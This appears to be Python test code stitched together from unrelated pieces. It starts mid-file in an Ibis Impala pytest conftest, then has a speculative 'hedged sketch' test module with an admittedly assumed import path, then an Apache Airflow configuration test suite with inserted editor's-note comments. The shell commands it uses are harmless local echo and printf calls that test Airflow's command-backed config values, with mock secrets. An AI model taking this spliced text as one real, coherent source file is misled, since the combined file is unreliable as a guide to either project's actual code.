int(os.environ.get('IBIS_TEST_IMPALA_PORT', "21050")) @property def tmp_db(self): options.impala.temp_db = tmp_db = os.environ.get( 'IBIS_TEST_TMP_DB', 'ibis_testing_tmp_db' ) return tmp_db @property def tmp_dir(self): options.impala.temp_hdfs_path = tmp_dir = os.environ.get( 'IBIS_TEST_TMP_HDFS_DIR', f'/tmp/__ibis_test_{util.guid()}' ) return tmp_dir @property def test_data_db(self): return os.environ.get('IBIS_TEST_DATA_DB', 'ibis_testing') @property def test_data_dir(self): return os.environ.get( 'IBIS_TEST_DATA_HDFS_DIR', '/__ibis/ibis-testing-data' ) @property def nn_host(self): return os.environ.get('IBIS_TEST_NN_HOST', 'localhost') @property def hdfs_port(self): return int(os.environ.get('IBIS_TEST_HDFS_PORT', 50070)) @property def hdfs_superuser(self): return os.environ.get('IBIS_TEST_HDFS_SUPERUSER', 'hdfs') @property def use_codegen(self): return ( os.environ.get('IBIS_TEST_USE_CODEGEN', 'False').lower() == 'true' ) @property def auth_mechanism(self): return os.environ.get('IBIS_TEST_AUTH_MECH', 'NOSASL') @property def hdfs_user(self): return os.environ.get('IBIS_TEST_HDFS_USER', 'hdfs') @property def hdfs_protocol(self): return os.environ.get("IBIS_TEST_HDFS_PROTOCOL", "webhdfs") @pytest.fixture def env(): return IbisTestEnv() @pytest.fixture def tmp_dir(env): options.impala.temp_hdfs_path = tmp_dir = env.tmp_dir return tmp_dir @pytest.fixture def test_data_db(env): return env.test_data_db @pytest.fixture def test_data_dir(env): return env.test_data_dir @pytest.fixture def hdfs(env, tmp_dir): fsspec = pytest.importorskip("fsspec") client = fsspec.filesystem( env.hdfs_protocol, host=env.nn_host, port=env.hdfs_port, user=env.hdfs_user, ) if not client.exists(tmp_dir): 
client.mkdir(tmp_dir) return client @pytest.fixture def con_no_hdfs(env, test_data_db): con = ibis.impala.connect( host=env.impala_host, database=test_data_db, port=env.impala_port, auth_mechanism=env.auth_mechanism, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(test_data_db) @pytest.fixture def con(env, hdfs, test_data_db): con = ibis.impala.connect( host=env.impala_host, database=test_data_db, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=hdfs, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(test_data_db) @pytest.fixture def temp_char_table(con): statement = """\ CREATE TABLE IF NOT EXISTS {} ( `group1` varchar(10), `group2` char(10) )""" name = 'testing_varchar_support' sql = statement.format(name) con.con.execute(sql) try: yield con.table(name) finally: assert name in con.list_tables(), name con.drop_table(name) @pytest.fixture def tmp_db(env, con, test_data_db): impala = pytest.importorskip("impala") tmp_db = env.tmp_db if tmp_db not in con.list_databases(): con.create_database(tmp_db) try: yield tmp_db finally: con.set_database(test_data_db) try: con.drop_database(tmp_db, force=True) except impala.error.HiveServer2Error: # The database can be dropped by another process during tear down # in the middle of dropping this one if tests are running in # parallel. # # We only care that it gets dropped before all tests are finished # running. pass @pytest.fixture def con_no_db(env, hdfs): con = ibis.impala.connect( host=env.impala_host, database=None, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=hdfs, ) if not env.use_codegen: con.disable_codegen() assert con.get_options()['DISABLE_CODEGEN'] == '1' try: yield con finally: con.set_database(None) @pytest.fixture def alltypes(con, test_data_db): return con.table("functional_alltypes") @pytest.fixture def alltypes_df(alltypes): return alltypes.execute() def _random_identifier(suffix): return f'__ibis_test_{suffix}_{util.guid()}' @pytest.fixture def temp_database(con, test_data_db): name = _random_identifier('database') con.create_database(name) try: yield name finally: con.set_database(test_data_db) con.drop_database(name, force=True) @pytest.fixture def temp_table(con): name = _random_identifier('table') try: yield name finally: assert name in con.list_tables(), name con.drop_table(name) @pytest.fixture def temp_table_db(con, temp_database): name = _random_identifier('table') try: yield temp_database, name finally: assert name in con.list_tables(database=temp_database), name con.drop_table(name, database=temp_database) @pytest.fixture def temp_view(con): name = _random_identifier('view') try: yield name finally: assert name in con.list_tables(), name con.drop_view(name) @pytest.fixture def temp_parquet_table_schema(): return ibis.schema( [('id', 'int32'), ('name', 'string'), ('files', 'int32')] ) @pytest.fixture def temp_parquet_table(con, tmp_db, temp_parquet_table_schema): name = util.guid() db = con.database(tmp_db) db.create_table(name, schema=temp_parquet_table_schema, format='parquet') try: yield db[name] finally: db.client.drop_table(name, database=tmp_db) @pytest.fixture def temp_parquet_table2(con, tmp_db, temp_parquet_table_schema): name = util.guid() db = con.database(tmp_db) db.create_table(name, schema=temp_parquet_table_schema, format='parquet') try: yield db[name] finally: db.client.drop_table(name, 
database=tmp_db) @pytest.fixture(scope="session") def mockcon(): return MockBackend() @pytest.fixture def kudu_table(con, test_data_db): name = 'kudu_backed_table' con.raw_sql( f""" CREATE TABLE {test_data_db}.{name} ( a STRING, PRIMARY KEY(a) ) PARTITION BY HASH PARTITIONS 2 STORED AS KUDU TBLPROPERTIES ( 'kudu.master_addresses' = 'kudu', 'kudu.num_tablet_replicas' = '1' )""" ) drop_sql = f'DROP TABLE {test_data_db}.{name}' try: yield con.table(name) finally: con.raw_sql(drop_sql) def translate(expr, context=None, named=False): if context is None: context = ImpalaCompiler.make_context() translator = ImpalaExprTranslator(expr, context=context, named=named) return translator.get_result()
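# -----------------------------------------------------------------------------
# Hedged sketch of a test module that would sit next to this conftest and have
# its fixtures injected by pytest.  The import path for translate() and the
# functional_alltypes column names are assumptions about the surrounding test
# package rather than guarantees.
from ibis.backends.impala.tests.conftest import translate  # assumed path


def test_upper_compiles(alltypes):
    expr = alltypes.string_col.upper()
    sql = translate(expr)
    assert "upper(" in sql.lower()


def test_alltypes_df_has_expected_column(alltypes_df):
    # alltypes_df is the executed pandas DataFrame fixture defined above.
    assert "string_col" in alltypes_df.columns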
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import io import os import re import tempfile import unittest import warnings from collections import OrderedDict from unittest import mock from airflow import configuration from airflow.configuration import ( DEFAULT_CONFIG, AirflowConfigException, AirflowConfigParser, conf, expand_env_var, get_airflow_config, get_airflow_home, parameterized_config, run_command, ) from tests.test_utils.config import conf_vars from tests.test_utils.reset_warning_registry import reset_warning_registry @unittest.mock.patch.dict( 'os.environ', { 'AIRFLOW__TESTSECTION__TESTKEY': 'testvalue', 'AIRFLOW__TESTSECTION__TESTPERCENT': 'with%percent', 'AIRFLOW__TESTCMDENV__ITSACOMMAND_CMD': 'echo -n "OK"', 'AIRFLOW__TESTCMDENV__NOTACOMMAND_CMD': 'echo -n "NOT OK"', }, ) class TestConf(unittest.TestCase): def test_airflow_home_default(self): with unittest.mock.patch.dict('os.environ'): if 'AIRFLOW_HOME' in os.environ: del os.environ['AIRFLOW_HOME'] self.assertEqual(get_airflow_home(), expand_env_var('~/airflow')) def test_airflow_home_override(self): with unittest.mock.patch.dict('os.environ', AIRFLOW_HOME='/path/to/airflow'): self.assertEqual(get_airflow_home(), '/path/to/airflow') def test_airflow_config_default(self): with unittest.mock.patch.dict('os.environ'): if 'AIRFLOW_CONFIG' in os.environ: del os.environ['AIRFLOW_CONFIG'] self.assertEqual(get_airflow_config('/home/airflow'), expand_env_var('/home/airflow/airflow.cfg')) def test_airflow_config_override(self): with unittest.mock.patch.dict('os.environ', AIRFLOW_CONFIG='/path/to/airflow/airflow.cfg'): self.assertEqual(get_airflow_config('/home//airflow'), '/path/to/airflow/airflow.cfg') @conf_vars({("core", "percent"): "with%%inside"}) def test_case_sensitivity(self): # section and key are case insensitive for get method # note: this is not the case for as_dict method self.assertEqual(conf.get("core", "percent"), "with%inside") self.assertEqual(conf.get("core", "PERCENT"), "with%inside") self.assertEqual(conf.get("CORE", "PERCENT"), "with%inside") def test_env_var_config(self): opt = conf.get('testsection', 'testkey') self.assertEqual(opt, 'testvalue') opt = conf.get('testsection', 'testpercent') self.assertEqual(opt, 'with%percent') self.assertTrue(conf.has_option('testsection', 'testkey')) with unittest.mock.patch.dict( 'os.environ', AIRFLOW__KUBERNETES_ENVIRONMENT_VARIABLES__AIRFLOW__TESTSECTION__TESTKEY='nested' ): opt = conf.get('kubernetes_environment_variables', 'AIRFLOW__TESTSECTION__TESTKEY') self.assertEqual(opt, 'nested') @mock.patch.dict( 'os.environ', AIRFLOW__KUBERNETES_ENVIRONMENT_VARIABLES__AIRFLOW__TESTSECTION__TESTKEY='nested' ) @conf_vars({("core", "percent"): "with%%inside"}) def test_conf_as_dict(self): cfg_dict = conf.as_dict() # test that configs are picked up 
self.assertEqual(cfg_dict['core']['unit_test_mode'], 'True') self.assertEqual(cfg_dict['core']['percent'], 'with%inside') # test env vars self.assertEqual(cfg_dict['testsection']['testkey'], '< hidden >') self.assertEqual( cfg_dict['kubernetes_environment_variables']['AIRFLOW__TESTSECTION__TESTKEY'], '< hidden >' ) def test_conf_as_dict_source(self): # test display_source cfg_dict = conf.as_dict(display_source=True) self.assertEqual(cfg_dict['core']['load_examples'][1], 'airflow.cfg') self.assertEqual(cfg_dict['core']['load_default_connections'][1], 'airflow.cfg') self.assertEqual(cfg_dict['testsection']['testkey'], ('< hidden >', 'env var')) def test_conf_as_dict_sensitive(self): # test display_sensitive cfg_dict = conf.as_dict(display_sensitive=True) self.assertEqual(cfg_dict['testsection']['testkey'], 'testvalue') self.assertEqual(cfg_dict['testsection']['testpercent'], 'with%percent') # test display_source and display_sensitive cfg_dict = conf.as_dict(display_sensitive=True, display_source=True) self.assertEqual(cfg_dict['testsection']['testkey'], ('testvalue', 'env var')) @conf_vars({("core", "percent"): "with%%inside"}) def test_conf_as_dict_raw(self): # test display_sensitive cfg_dict = conf.as_dict(raw=True, display_sensitive=True) self.assertEqual(cfg_dict['testsection']['testkey'], 'testvalue') # Values with '%' in them should be escaped self.assertEqual(cfg_dict['testsection']['testpercent'], 'with%%percent') self.assertEqual(cfg_dict['core']['percent'], 'with%%inside') def test_conf_as_dict_exclude_env(self): # test display_sensitive cfg_dict = conf.as_dict(include_env=False, display_sensitive=True) # Since testsection is only created from env vars, it shouldn't be # present at all if we don't ask for env vars to be included. self.assertNotIn('testsection', cfg_dict) def test_command_precedence(self): test_config = '''[test] key1 = hello key2_cmd = printf cmd_result key3 = airflow key4_cmd = printf key4_result ''' test_config_default = '''[test] key1 = awesome key2 = airflow [another] key6 = value6 ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) test_conf.sensitive_config_values = test_conf.sensitive_config_values | { ('test', 'key2'), ('test', 'key4'), } self.assertEqual('hello', test_conf.get('test', 'key1')) self.assertEqual('cmd_result', test_conf.get('test', 'key2')) self.assertEqual('airflow', test_conf.get('test', 'key3')) self.assertEqual('key4_result', test_conf.get('test', 'key4')) self.assertEqual('value6', test_conf.get('another', 'key6')) self.assertEqual('hello', test_conf.get('test', 'key1', fallback='fb')) self.assertEqual('value6', test_conf.get('another', 'key6', fallback='fb')) self.assertEqual('fb', test_conf.get('another', 'key7', fallback='fb')) self.assertEqual(True, test_conf.getboolean('another', 'key8_boolean', fallback='True')) self.assertEqual(10, test_conf.getint('another', 'key8_int', fallback='10')) self.assertEqual(1.0, test_conf.getfloat('another', 'key8_float', fallback='1')) self.assertTrue(test_conf.has_option('test', 'key1')) self.assertTrue(test_conf.has_option('test', 'key2')) self.assertTrue(test_conf.has_option('test', 'key3')) self.assertTrue(test_conf.has_option('test', 'key4')) self.assertFalse(test_conf.has_option('test', 'key5')) self.assertTrue(test_conf.has_option('another', 'key6')) cfg_dict = test_conf.as_dict(display_sensitive=True) self.assertEqual('cmd_result', cfg_dict['test']['key2']) self.assertNotIn('key2_cmd', cfg_dict['test']) # If we 
exclude _cmds then we should still see the commands to run, not # their values cfg_dict = test_conf.as_dict(include_cmds=False, display_sensitive=True) self.assertNotIn('key4', cfg_dict['test']) self.assertEqual('printf key4_result', cfg_dict['test']['key4_cmd']) @mock.patch("airflow.providers.hashicorp._internal_client.vault_client.hvac") @conf_vars( { ("secrets", "backend"): "airflow.providers.hashicorp.secrets.vault.VaultBackend", ("secrets", "backend_kwargs"): '{"url": "http://127.0.0.1:8200", "token": "token"}', } ) def test_config_from_secret_backend(self, mock_hvac): """Get Config Value from a Secret Backend""" mock_client = mock.MagicMock() mock_hvac.Client.return_value = mock_client mock_client.secrets.kv.v2.read_secret_version.return_value = { 'request_id': '2d48a2ad-6bcb-e5b6-429d-da35fdf31f56', 'lease_id': '', 'renewable': False, 'lease_duration': 0, 'data': { 'data': {'value': 'sqlite:////Users/airflow/airflow/airflow.db'}, 'metadata': { 'created_time': '2020-03-28T02:10:54.301784Z', 'deletion_time': '', 'destroyed': False, 'version': 1, }, }, 'wrap_info': None, 'warnings': None, 'auth': None, } test_config = '''[test] sql_alchemy_conn_secret = sql_alchemy_conn ''' test_config_default = '''[test] sql_alchemy_conn = airflow ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) test_conf.sensitive_config_values = test_conf.sensitive_config_values | { ('test', 'sql_alchemy_conn'), } self.assertEqual( 'sqlite:////Users/airflow/airflow/airflow.db', test_conf.get('test', 'sql_alchemy_conn') ) def test_getboolean(self): """Test AirflowConfigParser.getboolean""" test_config = """ [type_validation] key1 = non_bool_value [true] key2 = t key3 = true key4 = 1 [false] key5 = f key6 = false key7 = 0 [inline-comment] key8 = true #123 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to bool. Please check "key1" key in "type_validation" section. ' 'Current value: "non_bool_value".' ), ): test_conf.getboolean('type_validation', 'key1') self.assertTrue(isinstance(test_conf.getboolean('true', 'key3'), bool)) self.assertEqual(True, test_conf.getboolean('true', 'key2')) self.assertEqual(True, test_conf.getboolean('true', 'key3')) self.assertEqual(True, test_conf.getboolean('true', 'key4')) self.assertEqual(False, test_conf.getboolean('false', 'key5')) self.assertEqual(False, test_conf.getboolean('false', 'key6')) self.assertEqual(False, test_conf.getboolean('false', 'key7')) self.assertEqual(True, test_conf.getboolean('inline-comment', 'key8')) def test_getint(self): """Test AirflowConfigParser.getint""" test_config = """ [invalid] key1 = str [valid] key2 = 1 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to int. Please check "key1" key in "invalid" section. ' 'Current value: "str".' ), ): test_conf.getint('invalid', 'key1') self.assertTrue(isinstance(test_conf.getint('valid', 'key2'), int)) self.assertEqual(1, test_conf.getint('valid', 'key2')) def test_getfloat(self): """Test AirflowConfigParser.getfloat""" test_config = """ [invalid] key1 = str [valid] key2 = 1.23 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to float. Please check "key1" key in "invalid" section. ' 'Current value: "str".' 
), ): test_conf.getfloat('invalid', 'key1') self.assertTrue(isinstance(test_conf.getfloat('valid', 'key2'), float)) self.assertEqual(1.23, test_conf.getfloat('valid', 'key2')) def test_has_option(self): test_config = '''[test] key1 = value1 ''' test_conf = AirflowConfigParser() test_conf.read_string(test_config) self.assertTrue(test_conf.has_option('test', 'key1')) self.assertFalse(test_conf.has_option('test', 'key_not_exists')) self.assertFalse(test_conf.has_option('section_not_exists', 'key1')) def test_remove_option(self): test_config = '''[test] key1 = hello key2 = airflow ''' test_config_default = '''[test] key1 = awesome key2 = airflow ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual('hello', test_conf.get('test', 'key1')) test_conf.remove_option('test', 'key1', remove_default=False) self.assertEqual('awesome', test_conf.get('test', 'key1')) test_conf.remove_option('test', 'key2') self.assertFalse(test_conf.has_option('test', 'key2')) def test_getsection(self): test_config = ''' [test] key1 = hello ''' test_config_default = ''' [test] key1 = awesome key2 = airflow [testsection] key3 = value3 ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual(OrderedDict([('key1', 'hello'), ('key2', 'airflow')]), test_conf.getsection('test')) self.assertEqual( OrderedDict([('key3', 'value3'), ('testkey', 'testvalue'), ('testpercent', 'with%percent')]), test_conf.getsection('testsection'), ) def test_get_section_should_respect_cmd_env_variable(self): with tempfile.NamedTemporaryFile(delete=False) as cmd_file: cmd_file.write(b"#!/usr/bin/env bash\n") cmd_file.write(b"echo -n difficult_unpredictable_cat_password\n") cmd_file.flush() os.chmod(cmd_file.name, 0o0555) cmd_file.close() with mock.patch.dict("os.environ", {"AIRFLOW__KUBERNETES__GIT_PASSWORD_CMD": cmd_file.name}): content = conf.getsection("kubernetes") os.unlink(cmd_file.name) self.assertEqual(content["git_password"], "difficult_unpredictable_cat_password") def test_kubernetes_environment_variables_section(self): test_config = ''' [kubernetes_environment_variables] key1 = hello AIRFLOW_HOME = /root/airflow ''' test_config_default = ''' [kubernetes_environment_variables] ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual( OrderedDict([('key1', 'hello'), ('AIRFLOW_HOME', '/root/airflow')]), test_conf.getsection('kubernetes_environment_variables'), ) def test_broker_transport_options(self): section_dict = conf.getsection("celery_broker_transport_options") self.assertTrue(isinstance(section_dict['visibility_timeout'], int)) self.assertTrue(isinstance(section_dict['_test_only_bool'], bool)) self.assertTrue(isinstance(section_dict['_test_only_float'], float)) self.assertTrue(isinstance(section_dict['_test_only_string'], str)) @conf_vars( { ("celery", "worker_concurrency"): None, ("celery", "celeryd_concurrency"): None, } ) def test_deprecated_options(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options = { ('celery', 'worker_concurrency'): ('celery', 'celeryd_concurrency'), } # Remove it so we are sure we use the right setting conf.remove_option('celery', 'worker_concurrency') with self.assertWarns(DeprecationWarning): with mock.patch.dict('os.environ', 
AIRFLOW__CELERY__CELERYD_CONCURRENCY="99"): self.assertEqual(conf.getint('celery', 'worker_concurrency'), 99) with self.assertWarns(DeprecationWarning), conf_vars({('celery', 'celeryd_concurrency'): '99'}): self.assertEqual(conf.getint('celery', 'worker_concurrency'), 99) @conf_vars( { ('logging', 'logging_level'): None, ('core', 'logging_level'): None, } ) def test_deprecated_options_with_new_section(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options = { ('logging', 'logging_level'): ('core', 'logging_level'), } # Remove it so we are sure we use the right setting conf.remove_option('core', 'logging_level') conf.remove_option('logging', 'logging_level') with self.assertWarns(DeprecationWarning): with mock.patch.dict('os.environ', AIRFLOW__CORE__LOGGING_LEVEL="VALUE"): self.assertEqual(conf.get('logging', 'logging_level'), "VALUE") with self.assertWarns(DeprecationWarning), conf_vars({('core', 'logging_level'): 'VALUE'}): self.assertEqual(conf.get('logging', 'logging_level'), "VALUE") @conf_vars( { ("celery", "result_backend"): None, ("celery", "celery_result_backend"): None, ("celery", "celery_result_backend_cmd"): None, } ) def test_deprecated_options_cmd(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options[('celery', "result_backend")] = ('celery', 'celery_result_backend') conf.sensitive_config_values.add(('celery', 'celery_result_backend')) conf.remove_option('celery', 'result_backend') with conf_vars({('celery', 'celery_result_backend_cmd'): '/bin/echo 99'}): with self.assertWarns(DeprecationWarning): tmp = None if 'AIRFLOW__CELERY__RESULT_BACKEND' in os.environ: tmp = os.environ.pop('AIRFLOW__CELERY__RESULT_BACKEND') self.assertEqual(conf.getint('celery', 'result_backend'), 99) if tmp: os.environ['AIRFLOW__CELERY__RESULT_BACKEND'] = tmp def test_deprecated_values(self): def make_config(): test_conf = AirflowConfigParser(default_config='') # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback test_conf.deprecated_values = { 'core': { 'hostname_callable': (re.compile(r':'), r'.', '2.1'), }, } test_conf.read_dict( { 'core': { 'executor': 'SequentialExecutor', 'sql_alchemy_conn': 'sqlite://', 'hostname_callable': 'socket:getfqdn', }, } ) return test_conf with self.assertWarns(FutureWarning): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'socket.getfqdn') with self.assertWarns(FutureWarning): with unittest.mock.patch.dict('os.environ', AIRFLOW__CORE__HOSTNAME_CALLABLE='socket:getfqdn'): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'socket.getfqdn') with reset_warning_registry(): with warnings.catch_warnings(record=True) as warning: with unittest.mock.patch.dict( 'os.environ', AIRFLOW__CORE__HOSTNAME_CALLABLE='CarrierPigeon', ): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'CarrierPigeon') self.assertListEqual([], warning) def test_deprecated_funcs(self): for func in [ 'load_test_config', 'get', 'getboolean', 'getfloat', 'getint', 'has_option', 'remove_option', 'as_dict', 'set', ]: with mock.patch(f'airflow.configuration.conf.{func}') as mock_method: with self.assertWarns(DeprecationWarning): getattr(configuration, func)() mock_method.assert_called_once() def test_command_from_env(self): test_cmdenv_config = 
    def test_command_from_env(self):
        test_cmdenv_config = '''[testcmdenv]
itsacommand = NOT OK
notacommand = OK
'''
        test_cmdenv_conf = AirflowConfigParser()
        test_cmdenv_conf.read_string(test_cmdenv_config)
        test_cmdenv_conf.sensitive_config_values.add(('testcmdenv', 'itsacommand'))
        with unittest.mock.patch.dict('os.environ'):
            # AIRFLOW__TESTCMDENV__ITSACOMMAND_CMD maps to ('testcmdenv', 'itsacommand') in
            # sensitive_config_values and therefore should return 'OK' from the environment variable's
            # echo command, and must not return 'NOT OK' from the configuration
            self.assertEqual(test_cmdenv_conf.get('testcmdenv', 'itsacommand'), 'OK')
            # AIRFLOW__TESTCMDENV__NOTACOMMAND_CMD maps to no entry in sensitive_config_values and therefore
            # the option should return 'OK' from the configuration, and must not return 'NOT OK' from
            # the environment variable's echo command
            self.assertEqual(test_cmdenv_conf.get('testcmdenv', 'notacommand'), 'OK')
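
    # ------------------------------------------------------------------
    # Editor's note: illustrative sketch only, not part of the original
    # test suite. It restates the _CMD convention checked by
    # test_command_from_env above and the FERNET_KEY tests below: for an
    # option listed in sensitive_config_values, an
    # AIRFLOW__{SECTION}__{KEY}_CMD environment variable names a shell
    # command whose stdout is used as the option value, overriding the
    # value stored in the config file; a plain value in the config file,
    # in turn, takes precedence over a {key}_cmd option in that file.
    # The section/key below are hypothetical.
    #
    #   conf.sensitive_config_values.add(('demo', 'secret'))
    #   os.environ['AIRFLOW__DEMO__SECRET_CMD'] = 'echo -n s3cr3t'
    #   conf.get('demo', 'secret')   # -> 's3cr3t'
    # ------------------------------------------------------------------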
    def test_parameterized_config_gen(self):
        cfg = parameterized_config(DEFAULT_CONFIG)

        # making sure some basic building blocks are present:
        self.assertIn("[core]", cfg)
        self.assertIn("dags_folder", cfg)
        self.assertIn("sql_alchemy_conn", cfg)
        self.assertIn("fernet_key", cfg)

        # making sure replacement actually happened
        self.assertNotIn("{AIRFLOW_HOME}", cfg)
        self.assertNotIn("{FERNET_KEY}", cfg)

    def test_config_use_original_when_original_and_fallback_are_present(self):
        self.assertTrue(conf.has_option("core", "FERNET_KEY"))
        self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))

        fernet_key = conf.get('core', 'FERNET_KEY')

        with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
            fallback_fernet_key = conf.get("core", "FERNET_KEY")

        self.assertEqual(fernet_key, fallback_fernet_key)

    def test_config_throw_error_when_original_and_fallback_is_absent(self):
        self.assertTrue(conf.has_option("core", "FERNET_KEY"))
        self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))

        with conf_vars({('core', 'fernet_key'): None}):
            with self.assertRaises(AirflowConfigException) as cm:
                conf.get("core", "FERNET_KEY")

        exception = str(cm.exception)
        message = "section/key [core/fernet_key] not found in config"
        self.assertEqual(message, exception)

    def test_config_override_original_when_non_empty_envvar_is_provided(self):
        key = "AIRFLOW__CORE__FERNET_KEY"
        value = "some value"

        with mock.patch.dict('os.environ', {key: value}):
            fernet_key = conf.get('core', 'FERNET_KEY')

        self.assertEqual(value, fernet_key)

    def test_config_override_original_when_empty_envvar_is_provided(self):
        key = "AIRFLOW__CORE__FERNET_KEY"
        value = "some value"

        with mock.patch.dict('os.environ', {key: value}):
            fernet_key = conf.get('core', 'FERNET_KEY')

        self.assertEqual(value, fernet_key)

    @mock.patch.dict("os.environ", {"AIRFLOW__CORE__DAGS_FOLDER": "/tmp/test_folder"})
    def test_write_should_respect_env_variable(self):
        with io.StringIO() as string_file:
            conf.write(string_file)
            content = string_file.getvalue()
        self.assertIn("dags_folder = /tmp/test_folder", content)

    def test_run_command(self):
        write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
        cmd = f'import sys; {write}; sys.stdout.flush()'
        self.assertEqual(run_command(f"python -c '{cmd}'"), '\u1000foo')
        self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
        self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')

    def test_confirm_unittest_mod(self):
        self.assertTrue(conf.get('core', 'unit_test_mode'))

    @conf_vars({("core", "store_serialized_dags"): "True"})
    def test_store_dag_code_default_config(self):
        store_serialized_dags = conf.getboolean('core', 'store_serialized_dags', fallback=False)
        store_dag_code = conf.getboolean("core", "store_dag_code", fallback=store_serialized_dags)
        self.assertFalse(conf.has_option("core", "store_dag_code"))
        self.assertTrue(store_serialized_dags)
        self.assertTrue(store_dag_code)

    @conf_vars({("core", "store_serialized_dags"): "True", ("core", "store_dag_code"): "False"})
    def test_store_dag_code_config_when_set(self):
        store_serialized_dags = conf.getboolean('core', 'store_serialized_dags', fallback=False)
        store_dag_code = conf.getboolean("core", "store_dag_code", fallback=store_serialized_dags)
        self.assertTrue(conf.has_option("core", "store_dag_code"))
        self.assertTrue(store_serialized_dags)
        self.assertFalse(store_dag_code)
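
    # ------------------------------------------------------------------
    # Editor's note: illustrative sketch only, not part of the original
    # test suite. It spells out the two-step fallback verified by the two
    # store_dag_code tests above.
    #
    #   store_serialized_dags = conf.getboolean(
    #       'core', 'store_serialized_dags', fallback=False)
    #   store_dag_code = conf.getboolean(
    #       'core', 'store_dag_code', fallback=store_serialized_dags)
    #   # An explicit [core] store_dag_code setting wins; otherwise the
    #   # value mirrors store_serialized_dags, which itself defaults to
    #   # False when unset.
    # ------------------------------------------------------------------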